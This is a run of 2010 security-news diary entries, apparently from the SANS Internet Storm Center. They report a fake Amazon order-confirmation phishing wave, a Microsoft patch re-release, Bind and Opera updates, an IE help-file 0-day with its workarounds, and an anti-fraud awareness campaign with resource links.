A couple of readers wrote about a flood of fake Amazon.com order confirmations they are receiving. The e-mail claims to originate from Amazon.com, and attempts to trick the user into clicking on a link which will then lead to obfuscated JavaScript and malware.

This particular attack appears to be a new version of similar e-mails we have seen over the last week or so. The new version uses larger e-mail messages, which appear to be composed with Microsoft Word.

The text is still pretty concise. As a sample:

-----
Dear Customer,

Your order has been sucessfully confirmed. For your reference, here's a summary of your order:

You just confirmed order #2341-23483720-38123

Status: CONFIRMED

-----

At the end of the e-mail follows a link to a malware site, labeled "ORDER INFORMATION".

A number of different domains have been seen used so far.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

13 Comments

Published: 2010-03-03

MS10-015 re-released

Microsoft has re-released the patch for MS10-015 (http://blogs.technet.com/msrc/archive/2010/03/02/update-ms10-015-security-update-re-released-with-new-detection-logic.aspx).  Reader Brian noticed that the patch in his WSUS had expired today and correctly surmised that an update was imminent.  

A tool has also been released that will scan machines for compatibility with the new patch.  This is also available from the above link.  

The update will not be applied to systems on which the original patch is already installed. 

Mark

2 Comments

Published: 2010-03-02

Updates for your consumption this morning (Bind, Opera)

Okay, so it's morning in the US, so I thought I'd get the US's day started by posting a couple updates that were brought to our attention this morning.

First off is Bind:

Bind 9.6.2 is now available here: ftp://ftp.isc.org/isc/bind9/9.6.2/bind-9.6.2.tar.gz

There have been a ton of updates to Bind since 9.6.0, so make sure you check the release notes here: http://isc.org/files/release-notes/962.html

Second is Opera:

It looks like Opera 10.50 for Windows has been released. (10.50 for Mac is still in beta).  Check out the Changelog for 10.50 here: http://www.opera.com/docs/changelogs/windows/1050/

Then get your fresh download here: http://www.opera.com/browser/download/?os=windows&ver=10.50&local=y

 

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

0 Comments

Published: 2010-03-01

IE 0-day using .hlp files

A POC has been posted which outlines how to use VBScript in a .HLP file to invoke winhlp32.exe in Windows 2000, Windows XP SP2, SP3 & Windows 2003 SP2. A malicious page is needed to trick the user into pressing the F1 button which invokes the help function,arbitrary commands can then be executed. The attack works in IE 6, 7, & 8. 

A work around is to disable active scripting in Internet Explorer.  A second work around is to change the permission on winhlp32.exe  as shown in the advisory.

Microsoft has posted an advisory  here  www.microsoft.com/technet/security/advisory/981169.mspx

Whilst we haven't seen any attacks based on this just yet, if you do please let us know. 

Mark 

(Thanks David & Pholder)

 

3 Comments

Published: 2010-03-01

AS/NZ "Online Offensive - Fight fraud online" week March 1-7

 The Australian Competition & Consumer Commission (ACCC) released a report on online fraud today (http://www.accc.gov.au/content/index.phtml/itemId/916075) as part of their awareness campaign "Online Offensive - Fight Fraud Online" which runs March 1-7.  The programme runs every year in Australia and New Zealand and aims to educate people about online scams and is a cooperative effort between government and private enterprise. The idea is to provide non-IT people with some of the tools that they can use to recognise the various schemes. We all know someone who has been taken in. 

So if you are helping out with Seniors computing courses, or other community computing awareness course, providing some in house training, or even performing internet help desk duties for family members, then you may find some of this information useful.

The following sites all have information on the different scams online: 

  • www.scamwatch.gov.au - The ACCC also runs the scamwatch website that has a lot of easy to understand information about the various scams doing the rounds.  
  • www.fido.gov.au - The Australian Securities and Investments Commission (ASIC) has their Fido web site, look under scams & warnings for information.  
  • www.lookstoogoodtobetrue.com - is a good resource for easily digestible scam information.  (thanks Tim)
  • www.ftc.gov/bcp/menus/consumer/tech/scams.shtm - The FTC site has scam information. It is written in governmentese so you may need to translate, but nonetheless some good information. 
  • www.ftc.gov/bcp/menus/consumer/tech/scams.shtm - A second FTC web site with some more specific information
  • www.fbi.gov/cyberinvest/escams.htm - This FBI page has information on some of the newer scams. 
  • www.usa.gov/Citizen/Topics/Internet_Fraud.shtml - This internet fraud page provides information on where to report fraud as well as some general information.  
  • www.oft.gov.uk/advice_and_resources/small_businesses/scams/ - Some basic info on this UK web site regarding scams
  • www.onguardonline.gov - An interactive site providing some good information to help protect internet users

If you have links to government sites specifically related to scams and fraud let us know.  

Mark 
 

0 Comments